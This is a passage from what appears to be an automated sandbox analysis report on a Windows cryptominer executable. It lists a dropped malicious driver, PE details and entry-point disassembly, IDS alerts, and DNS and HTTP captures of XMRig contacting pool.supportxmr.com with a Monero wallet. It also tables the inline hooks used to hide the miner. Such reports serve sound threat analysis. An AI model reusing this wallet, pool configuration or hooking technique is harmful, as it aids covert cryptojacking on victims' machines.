                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Windows\Temp\__PSScriptPolicyTest_l5a2fjur.kdb.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Windows\Temp\__PSScriptPolicyTest_xuvzwikb.x0v.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Windows\Temp\yycjbdwxjaoe.sys

                                                                        Download File
                                                                        Process:C:\ProgramData\Screenshots\Lightshot.exe
                                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):14544
                                                                        Entropy (8bit):6.2660301556221185
                                                                        Encrypted:false
                                                                        SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                        MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                        SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                        SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                        SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                                        Joe Sandbox View:
                                                                        • Filename: chrtrome22.exe, Detection: malicious, Browse
                                                                        • Filename: pTVKHqys2h.exe, Detection: malicious, Browse
                                                                        • Filename: 174.exe, Detection: malicious, Browse
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        • Filename: 47SXvEQ.exe, Detection: malicious, Browse
                                                                        • Filename: xmr new.exe, Detection: malicious, Browse
                                                                        • Filename: eth.exe, Detection: malicious, Browse
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        • Filename: hiwA7Blv7C.exe, Detection: malicious, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Entropy (8bit):6.537334125155787
                                                                        TrID:
                                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:nW2oopMIdg.exe
                                                                        File size:2'876'416 bytes
                                                                        MD5:990a3f3b1273510f210fb9b541da219f
                                                                        SHA1:33e536c5b4bdb6f6042f93445dffd8a3ad488e8b
                                                                        SHA256:35a8d03f86ae6f92424d6424fe0805d338eccedff177b400182102685299022c
                                                                        SHA512:495734313cae980d3f48ef78422cf9484eb347833672fd5c693f8f8c92c1c0d51986795cd55a3148be18ff0c9d36adff5a1c3ff18200668dd33f3978a459c246
                                                                        SSDEEP:49152:lYul8CapE2jLY0vFhbkQbIptv1xZ4ayOIYDIGC3FYKjPgz+WWrS2sWioLyVQGMNx:lYLCGYYbkQbytvVeOIerC1zPgSWW/pio
                                                                        TLSH:29D523E536CE4726C8143C71F4A6898918EF7A8AD3BBB1B7644483736A747B34DB7048
                                                                        File Content Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."..........N+.....@..........@.............................p,...........`........................................

                                                                        File Icon

                                                                        Icon Hash:00928e8e8686b000

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x140001140
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x140000000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x678007E8 [Thu Jan 9 17:31:20 2025 UTC]
                                                                        TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:6
                                                                        OS Version Minor:0
                                                                        File Version Major:6
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:6
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:de41d4e0545d977de6ca665131bb479a

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        dec eax
                                                                        sub esp, 28h
                                                                        dec eax
                                                                        mov eax, dword ptr [00009ED5h]
                                                                        mov dword ptr [eax], 00000001h
                                                                        call 00007F9D192F275Fh
                                                                        nop
                                                                        nop
                                                                        nop
                                                                        dec eax
                                                                        add esp, 28h
                                                                        ret
                                                                        nop
                                                                        inc ecx
                                                                        push edi
                                                                        inc ecx
                                                                        push esi
                                                                        push esi
                                                                        push edi
                                                                        push ebx
                                                                        dec eax
                                                                        sub esp, 20h
                                                                        dec eax
                                                                        mov eax, dword ptr [00000030h]
                                                                        dec eax
                                                                        mov edi, dword ptr [eax+08h]
                                                                        dec eax
                                                                        mov esi, dword ptr [00009EC9h]
                                                                        xor eax, eax
                                                                        dec eax
                                                                        cmpxchg dword ptr [esi], edi
                                                                        sete bl
                                                                        je 00007F9D192F2780h
                                                                        dec eax
                                                                        cmp edi, eax
                                                                        je 00007F9D192F277Bh
                                                                        dec esp
                                                                        mov esi, dword ptr [0000BAA9h]
                                                                        nop word ptr [eax+eax+00000000h]
                                                                        mov ecx, 000003E8h
                                                                        inc ecx
                                                                        call esi
                                                                        xor eax, eax
                                                                        dec eax
                                                                        cmpxchg dword ptr [esi], edi
                                                                        sete bl
                                                                        je 00007F9D192F2757h
                                                                        dec eax
                                                                        cmp edi, eax
                                                                        jne 00007F9D192F2739h
                                                                        dec eax
                                                                        mov edi, dword ptr [00009E90h]
                                                                        mov eax, dword ptr [edi]
                                                                        cmp eax, 01h
                                                                        jne 00007F9D192F275Eh
                                                                        mov ecx, 0000001Fh
                                                                        call 00007F9D192FB464h
                                                                        jmp 00007F9D192F2779h
                                                                        cmp dword ptr [edi], 00000000h
                                                                        je 00007F9D192F275Bh
                                                                        mov byte ptr [002BED21h], 00000001h
                                                                        jmp 00007F9D192F276Bh
                                                                        mov dword ptr [edi], 00000001h
                                                                        dec eax
                                                                        mov ecx, dword ptr [00009E7Ah]
                                                                        dec eax
                                                                        mov edx, dword ptr [00009E7Bh]
                                                                        call 00007F9D192FB45Bh
                                                                        mov eax, dword ptr [edi]
                                                                        cmp eax, 01h
                                                                        jne 00007F9D192F276Bh
                                                                        dec eax
                                                                        mov ecx, dword ptr [00009E50h]

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc9780x3c.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c50000x350.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2c20000x18c.pdata
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2c60000x78.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0xb0a00x28.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb4100x138.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xcb100x158.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x90660x92000a4b4175ec481c50c984590193f52f1aFalse0.4883615154109589data6.152703474213046IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0xb0000x20cc0x2200d031d7bab38efd70773bc93d35fb58a6False0.45128676470588236data4.641594651888488IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0xe0000x2b31900x2b20003a7c43391555cab936df087d609d1d01unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .pdata0x2c20000x18c0x20071971e4bff0784f885ec5f86f32b6a4aFalse0.521484375data3.204851117192452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .00cfg0x2c30000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .tls0x2c40000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rsrc0x2c50000x3500x40056e59519fb7d2369bbf7a9e80aa61940False0.3642578125data2.8188436463026587IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x2c60000x780x2006490b02f8b3f1652073b3b9bdd2acfb4False0.236328125data1.4268248333801306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_VERSION0x2c50600x2f0SysEx File - IDPEnglishUnited States0.449468085106383

                                                                        Imports

                                                                        DLLImport
                                                                        msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
                                                                        KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2025-01-10T10:35:51.244025+01002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.549704141.94.96.7180TCP
                                                                        2025-01-10T10:36:03.317801+01002047928ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com)2192.168.2.5632991.1.1.153UDP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jan 10, 2025 10:36:03.329967976 CET4970480192.168.2.5141.94.96.71
                                                                        Jan 10, 2025 10:36:03.334904909 CET8049704141.94.96.71192.168.2.5
                                                                        Jan 10, 2025 10:36:03.335005045 CET4970480192.168.2.5141.94.96.71
                                                                        Jan 10, 2025 10:36:03.335095882 CET4970480192.168.2.5141.94.96.71
                                                                        Jan 10, 2025 10:36:03.339915037 CET8049704141.94.96.71192.168.2.5
                                                                        Jan 10, 2025 10:36:03.968880892 CET8049704141.94.96.71192.168.2.5
                                                                        Jan 10, 2025 10:36:04.009497881 CET4970480192.168.2.5141.94.96.71
                                                                        Jan 10, 2025 10:36:06.134874105 CET8049704141.94.96.71192.168.2.5
                                                                        Jan 10, 2025 10:36:06.181499958 CET4970480192.168.2.5141.94.96.71
                                                                        Jan 10, 2025 10:36:15.144399881 CET5736053192.168.2.51.1.1.1
                                                                        Jan 10, 2025 10:36:15.149239063 CET53573601.1.1.1192.168.2.5
                                                                        Jan 10, 2025 10:36:15.149332047 CET5736053192.168.2.51.1.1.1
                                                                        Jan 10, 2025 10:36:15.154114008 CET53573601.1.1.1192.168.2.5
                                                                        Jan 10, 2025 10:36:15.616575003 CET5736053192.168.2.51.1.1.1
                                                                        Jan 10, 2025 10:36:15.621630907 CET53573601.1.1.1192.168.2.5
                                                                        Jan 10, 2025 10:36:15.621767044 CET5736053192.168.2.51.1.1.1
                                                                        Jan 10, 2025 10:36:16.531831980 CET8049704141.94.96.71192.168.2.5
                                                                        Jan 10, 2025 10:36:16.712642908 CET4970480192.168.2.5141.94.96.71
                                                                        Jan 10, 2025 10:36:18.708017111 CET8049704141.94.96.71192.168.2.5
                                                                        Jan 10, 2025 10:36:18.900253057 CET4970480192.168.2.5141.94.96.71
                                                                        Jan 10, 2025 10:36:30.317203999 CET8049704141.94.96.71192.168.2.5
                                                                        Jan 10, 2025 10:36:30.400213003 CET4970480192.168.2.5141.94.96.71
                                                                        Jan 10, 2025 10:36:40.431463003 CET8049704141.94.96.71192.168.2.5
                                                                        Jan 10, 2025 10:36:40.509526014 CET4970480192.168.2.5141.94.96.71
                                                                        Jan 10, 2025 10:36:40.735584021 CET5394353192.168.2.5162.159.36.2
                                                                        Jan 10, 2025 10:36:40.740444899 CET5353943162.159.36.2192.168.2.5
                                                                        Jan 10, 2025 10:36:40.740523100 CET5394353192.168.2.5162.159.36.2
                                                                        Jan 10, 2025 10:36:40.745385885 CET5353943162.159.36.2192.168.2.5
                                                                        Jan 10, 2025 10:36:41.195298910 CET5394353192.168.2.5162.159.36.2
                                                                        Jan 10, 2025 10:36:41.200393915 CET5353943162.159.36.2192.168.2.5
                                                                        Jan 10, 2025 10:36:41.202263117 CET5394353192.168.2.5162.159.36.2
                                                                        Jan 10, 2025 10:36:52.456737995 CET8049704141.94.96.71192.168.2.5
                                                                        Jan 10, 2025 10:36:52.509519100 CET4970480192.168.2.5141.94.96.71
                                                                        Jan 10, 2025 10:37:02.785851955 CET8049704141.94.96.71192.168.2.5
                                                                        Jan 10, 2025 10:37:02.900156975 CET4970480192.168.2.5141.94.96.71
                                                                        Jan 10, 2025 10:37:12.795152903 CET8049704141.94.96.71192.168.2.5
                                                                        Jan 10, 2025 10:37:12.915760994 CET4970480192.168.2.5141.94.96.71
                                                                        Jan 10, 2025 10:37:22.970514059 CET8049704141.94.96.71192.168.2.5
                                                                        Jan 10, 2025 10:37:23.161478043 CET4970480192.168.2.5141.94.96.71
                                                                        Jan 10, 2025 10:37:34.164400101 CET8049704141.94.96.71192.168.2.5
                                                                        Jan 10, 2025 10:37:34.212661028 CET4970480192.168.2.5141.94.96.71
                                                                        Jan 10, 2025 10:37:46.464801073 CET8049704141.94.96.71192.168.2.5
                                                                        Jan 10, 2025 10:37:46.603266954 CET4970480192.168.2.5141.94.96.71
                                                                        Jan 10, 2025 10:37:57.203650951 CET8049704141.94.96.71192.168.2.5
                                                                        Jan 10, 2025 10:37:57.415792942 CET4970480192.168.2.5141.94.96.71

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jan 10, 2025 10:36:03.317800999 CET6329953192.168.2.51.1.1.1
                                                                        Jan 10, 2025 10:36:03.325510979 CET53632991.1.1.1192.168.2.5
                                                                        Jan 10, 2025 10:36:15.143188953 CET53608071.1.1.1192.168.2.5
                                                                        Jan 10, 2025 10:36:40.735182047 CET5360017162.159.36.2192.168.2.5
                                                                        Jan 10, 2025 10:36:41.204821110 CET53503111.1.1.1192.168.2.5

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Jan 10, 2025 10:36:03.317800999 CET192.168.2.51.1.1.10xd21eStandard query (0)pool.supportxmr.comA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Jan 10, 2025 10:36:03.325510979 CET1.1.1.1192.168.2.50xd21eNo error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 10, 2025 10:36:03.325510979 CET1.1.1.1192.168.2.50xd21eNo error (0)pool-fr.supportxmr.com141.94.96.144A (IP address)IN (0x0001)false
                                                                        Jan 10, 2025 10:36:03.325510979 CET1.1.1.1192.168.2.50xd21eNo error (0)pool-fr.supportxmr.com141.94.96.195A (IP address)IN (0x0001)false
                                                                        Jan 10, 2025 10:36:03.325510979 CET1.1.1.1192.168.2.50xd21eNo error (0)pool-fr.supportxmr.com141.94.96.71A (IP address)IN (0x0001)false

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.549704141.94.96.71804508C:\Windows\System32\dialer.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Jan 10, 2025 10:36:03.335095882 CET596OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 36 4d 33 39 44 4d 31 44 51 6a 46 4b 55 6e 54 33 74 32 4b 69 48
                                                                        Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"46M39DM1DQjFKUnT3t2KiHNU6qQjmRF79J31fSbtBNafUX9B2gAwysjLFADQ5mhqR4M6C8JJRFXwLPxDHapuCrHE3mRBjTw","pass":"Ultima","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/
                                                                        Jan 10, 2025 10:36:03.968880892 CET538INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 31 66 63 66 31 61 31 64 2d 33 39 34 31 2d 34 39 66 33 2d 38 37 64 65 2d 62 62 62 33 30
                                                                        Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"1fcf1a1d-3941-49f3-87de-bbb3015b97e5","job":{"blob":"1010fbd383bc06ca3f810fd9c56c49dd4d214ad84ef82765919a0dd8462e68424b6661b8b7282800000000f8b23ac90f692ad6af23855bc9bc4f381b4dd13dd3e975b7c0c
                                                                        Jan 10, 2025 10:36:06.134874105 CET420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 35 64 34 38 33 62 63 30 36 63 61 33 66 38 31 30 66 64 39 63 35 36 63 34 39 64 64
                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101085d483bc06ca3f810fd9c56c49dd4d214ad84ef82765919a0dd8462e68424b6661b8b7282800000000a70ed1613f655caa469dab3eab0129259b1016d4822986761cfecac66485f9aa4f","job_id":"rYU0I1Epjxl6wf6AJmit0FZO1For"
                                                                        Jan 10, 2025 10:36:16.531831980 CET420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 30 64 34 38 33 62 63 30 36 63 61 33 66 38 31 30 66 64 39 63 35 36 63 34 39 64 64
                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101090d483bc06ca3f810fd9c56c49dd4d214ad84ef82765919a0dd8462e68424b6661b8b7282800000000851e70714ac4abc90ff92a2b2d7a6bc4a3742d98fe48d02c458b20dae3bec01353","job_id":"z45UTv8G64d9jx+oJDKJXu9L4Rok"
                                                                        Jan 10, 2025 10:36:18.708017111 CET420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 32 64 34 38 33 62 63 30 36 31 65 33 64 30 35 32 64 38 63 37 32 64 36 30 39 38 30
                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101092d483bc061e3d052d8c72d609804675148e567bed958fe8827c5aec4d67c595ba8b4a0e8e0000000064b7f26fefab437e50f0bf5a10a353db4a1ad7c7123cf16712a016a8b34d680702","job_id":"i36L8xtVwSnXGqKS1Ub1rke40PKt"
                                                                        Jan 10, 2025 10:36:30.317203999 CET420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 65 64 34 38 33 62 63 30 36 31 65 33 64 30 35 32 64 38 63 37 32 64 36 30 39 38 30
                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10109ed483bc061e3d052d8c72d609804675148e567bed958fe8827c5aec4d67c595ba8b4a0e8e00000000ed300fe08d982387e1dd7b5bd25c9525a7842d3c0f7ae574c492dc4bd8da175607","job_id":"8g8BACOfS20UCQ35l7twN1UcD9jF"
                                                                        Jan 10, 2025 10:36:40.431463003 CET420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 38 64 34 38 33 62 63 30 36 31 65 33 64 30 35 32 64 38 63 37 32 64 36 30 39 38 30
                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a8d483bc061e3d052d8c72d609804675148e567bed958fe8827c5aec4d67c595ba8b4a0e8e00000000dfbd38264005f46b28f2dfcbd0b2b4ab1bf4a92738ee54fb51268b4a084d7b070a","job_id":"qzP+wrYvhGPcLWh+CgFhKiT6uY+s"
                                                                        Jan 10, 2025 10:36:52.456737995 CET420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 34 64 34 38 33 62 63 30 36 31 65 33 64 30 35 32 64 38 63 37 32 64 36 30 39 38 30
                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010b4d483bc061e3d052d8c72d609804675148e567bed958fe8827c5aec4d67c595ba8b4a0e8e00000000d5f4b8cfeaa6ce94b542e8a5e1ff6d2bf2d70a399a7ba1568144435e2c812a100f","job_id":"5fwJV97zChLtAOHEAgxKsJzhH+V1"
                                                                        Jan 10, 2025 10:37:02.785851955 CET420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 65 64 34 38 33 62 63 30 36 31 65 33 64 30 35 32 64 38 63 37 32 64 36 30 39 38 30
                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010bed483bc061e3d052d8c72d609804675148e567bed958fe8827c5aec4d67c595ba8b4a0e8e00000000576db3f2b7768cbcfbf45cab0288667d7e06023264fd060468fb4c31e7b0f39314","job_id":"EfhK+pzlXURDKY4a6LdJi5SakjtD"
                                                                        Jan 10, 2025 10:37:12.795152903 CET420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 38 64 34 38 33 62 63 30 36 31 65 33 64 30 35 32 64 38 63 37 32 64 36 30 39 38 30
                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010c8d483bc061e3d052d8c72d609804675148e567bed958fe8827c5aec4d67c595ba8b4a0e8e00000000242f4815cb40760e45fbacc63cc92c7dd02d6211b4d0c02ea602536153821aa51a","job_id":"xHm1q4gS0BDF66ovz70uv/eQODWX"


                                                                        Code Manipulations

                                                                        User Modules

                                                                        Hook Summary

                                                                        Function NameHook TypeActive in Processes
                                                                        ZwEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                                        NtQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                                        ZwResumeThreadINLINEwinlogon.exe, explorer.exe
                                                                        NtDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                                        ZwDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                                        NtEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                                        NtQueryDirectoryFileINLINEwinlogon.exe, explorer.exe
                                                                        ZwEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                                        ZwQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                                        NtResumeThreadINLINEwinlogon.exe, explorer.exe
                                                                        RtlGetNativeSystemInformationINLINEwinlogon.exe, explorer.exe
                                                                        NtQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                        NtEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                                        ZwQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                        ZwQueryDirectoryFileINLINEwinlogon.exe, explorer.exe

                                                                        Processes

                                                                        Process: winlogon.exe, Module: ntdll.dll
                                                                        Function NameHook TypeNew Data
                                                                        ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                        NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                        ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                        NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                        ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                        NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                        NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                        ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                        ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                        NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                        RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                        NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
